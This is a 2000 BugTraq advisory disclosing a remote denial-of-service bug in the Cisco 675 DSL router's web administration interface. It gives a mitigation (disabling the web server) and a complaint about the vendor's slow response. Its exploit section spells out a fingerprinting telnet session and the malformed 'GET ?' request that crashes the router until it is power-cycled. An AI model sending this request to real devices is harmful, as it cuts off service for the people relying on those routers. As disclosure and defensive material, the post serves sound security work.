Date:         Tue, 28 Nov 2000 16:01:37 -0800
From: CDI <cdi@THEWEBMASTERS.NET>
Subject:      Cisco 675 Denial of Service Attack
To: BUGTRAQ@SECURITYFOCUS.COM

OK, since everyone is up-in-arms over vendor notification and their
response times, here's an example of what happens if you give a vendor too
-much- time. 
-----------------

Title : Cisco 675 Web Administration Denial of Service
Device: Cisco 675 DSL Router
Class : Denial of Service (remote)

Vendor Notified: January 10th, 2000 (Yes folks, 11 months ago)

Patch Available: Nope - see below

                  ---------------------------------

    The Cisco 675 DSL routers with the Web Administration Interface enabled
can be crashed (hard) using a simple GET request. CBOS versions 2.0.x
through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not
been tested, but there are no notes in the 2.3.x changelogs to indicate that
they've fixed this problem. Affected 675s were configured in PPP mode. The
'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x
and 2.2.x.

The Cisco 67x series of DSL routers are produced and distributed for
specific telcos to offer to their clients and as such, the installation base
is quite large. (To hazard a guess, if just 20% of all Qwest DSL users are
using Cisco 675s, the installation base would exceed 25,000) The DSL
adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco
676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675
but other adapters in this series may have similar problems and should be
tested for vulnerability to this type of attack. I would be interested in
the results if someone has access to and can test the other adapters in this
series. The CBOS codebase is an acquired OS and as such, has no relationship
at all to the main Cisco IOS codebase.

Fix First:
    Disable the Web Based Administration Interface in your 675 until a
    patch or CBOS revision is made available.

  Web Server Disable commands: (2.0.x or better)
    (CBOS 'enable' mode) 
    cbos# set web disabled
    cbos# write
    cbos# reboot

Exploit:
    First find a 675 with the Web Admin server running.

Fingerprint:
    telnet vic.tim.ip.addr 80
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET / HTTP/1.0
    HTTP/1.0 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: Basic realm="CISCO_WEB"

    <CENTER><h1>Unauthorized Access 401</h1></center>
    Connection closed by foreign host.

Now kill it:
    telnet vic.tim.ip.addr 80
    Trying vic.tim.ip.addr...
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET ? [LF][LF]

(your telnet session dies here, and so does the router)

Dead as a post:
    ping -c5 vic.tim.ip.addr   
    PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
    5 packets transmitted, 0 packets received, 100% packet loss

The Cisco never recovers - it's hosed until the router is power-cycled. A
simple 'GET ? \n\n' is all it takes to kill the router. In case you're
wondering, I had meant to enter 'GET /', but my finger slipped on the shift
key. Neat eh?

VENDOR RESPONSE: None, and I'll tell you why. (Warning, long rant ahead that
has nothing to do with the guts of this advisory.)

I first notified 'security-alert@cisco.com' in January of this year. Got an
immediate response and all seemed well. Then I didn't hear back from them
for a couple of months and promptly forgot all about this. Then in April the
'Cisco IOS Software TELNET Option Handling Vulnerability' (see
http://www.securityfocus.com/archive/1/56207) was announced. This
vulnerability was very similar to the Cisco 675 problem and I re-contacted
Cisco. They claimed they were "still working on replicating the error". Uh,
OK, whatever. I placed it on the back-burner and promptly forgot all about
it again because I didn't want to announce this vulnerability until a vendor
approved fix was available. (The installation base for this adapter is
humongous) Then in October of this year some discussion of a potential
problem with the Cisco 678 occurred on the VULN-DEV mailing list. A Cisco rep
on the list had the audacity to complain about prior-notification. (Never
mind that VULN-DEV is designed specifically to investigate potential
vulnerabilities) Anyway, the issue was again brought before Cisco, they
again promised to address this issue.

The conversation on VULN-DEV prompted some private correspondence with CORE
SDI. The last I heard from Cisco was actually by way of Iván Arce at CORE
SDI who wanted more information regarding the Cisco 675 problem while he
investigated the CISCO IOS and its Web Admin bugs. (See CORE-20002510,
BugTraq ID 1838) The vulnerabilities are strikingly similar even though IOS
is a completely separate codebase from CBOS. Anyway, CORE got word from
Cisco PSIRT that they would be addressing this issue by "mid November".

Needless to say, this hasn't happened yet.

This week's discussion of vendor notification and response times was just
gravy.

It should also be noted that since January, Cisco has released at least 2
updates to the CBOS 2.x series, without addressing this issue. (no mention
of it in their changelogs, although to be fair I've yet to have the
opportunity to test this bug against either 2.3.0 or 2.3.5.)

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/
    "Ok spammer, I'll 'just hit delete'. You can be 'Delete'."
                         --  Ron "SuperTroll" Ritzman, NANAE